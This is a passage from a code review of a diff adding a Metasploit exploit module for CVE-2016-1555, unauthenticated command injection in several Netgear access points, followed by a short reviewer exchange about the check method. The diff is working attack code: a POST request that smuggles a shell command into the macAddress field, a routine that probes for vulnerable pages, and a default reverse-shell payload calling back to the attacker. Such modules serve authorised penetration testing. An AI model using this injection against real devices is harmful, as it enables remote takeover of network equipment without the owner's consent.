modules/exploits/linux/http/netgear_unauth_exec.rb

```diff
@@ -0,0 +1,172 @@
+        (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in
+        Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350,
+        WNDAP360, and WNDAP660 before 3.5.5.0 allow remote attackers to execute
+        arbitrary commands.
+      },
+      'Author'      =>
+        [
+          'Daming Dominic Chen <ddchen[at]cs.cmu.edu>', # Vuln discovery
+          'Imran Dawoodjee <imrandawoodjee.infosec[at]gmail.com>' # MSF module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['CVE', '2016-1555'],
+          ['URL', 'https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic'],
+          ['PACKETSTORM', '135956'],
+          ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/112']
+        ],
+      'DisclosureDate' => 'Feb 25 2016', # According to http://seclists.org/fulldisclosure/2016/Feb/112
+      'Privileged'     => true,
+      'Platform'       => 'linux',
+      'Arch'        => ARCH_MIPSBE,
+      'Payload'     => {},
+      'DefaultOptions' => {
+        'PAYLOAD'  => 'linux/mipsbe/shell_reverse_tcp',
+        'WfsDelay' => 5 },
+      'Targets'        =>
+        [
+          [ 'Automatic',	{ } ]
+        ],
+      'DefaultTarget'  => 0
+      ))
+
+    register_options(
+      [
+        OptPath.new('URI_LIST', [true,  "The vulnerable URIs.", '/usr/share/metasploit-framework/data/wordlists/netgear_boardData_paths.txt']),
+        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 5]),
+      ])
+    deregister_options('SSL') # because victim side does not support SSL
+    deregister_options('SSLCert') # if SSL is disabled, might as well disable this for cleaner interface
+  end
+
+  # post request
+  def request_post(uri,command)
+    response = send_request_cgi({
+      'uri'    => uri,
+      'method' => 'POST',
+      'data'   => "macAddress=000000000000;#{command};&reginfo=1&writeData=Submit\r\n"
+    })
+    return response
+  end
+
+  # get request
+  def request_get(uri)
+    response = send_request_cgi({
+      'uri'    => normalize_uri('/', uri),
+      'method' => 'GET'
+    })
+    return response
+  end
+
+  # find the vulnerable uri(s)
+  def find_uri
+    conn_check = request_get("/")
+    if not conn_check
+      return :fail
+    else
+      File.read(datastore['URI_LIST']).each_line do |uri|
+        response_get = request_get(uri.chomp)
+        if response_get && response_get.code == 200
+          return uri.chomp
+        end
+      end
+      return :fail.to_s
+    end
+  end
+
+  # check for vulnerability existence
+  def check
+    lhost = datastore['LHOST'] # implied, required for the "ping" check -_-
+    vuln_check_param = "ping -c 1 #{lhost}" # make this an actual check instead of a ping
+    target_uri = find_uri
+    if target_uri == "fail"
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable.'
```

Comment:
`fail_with` and `print_*` methods are verboten in the `check` method.

Use `vprint_error` instead.

Reply:
Not necessary any longer, there will be no more printing from the check method.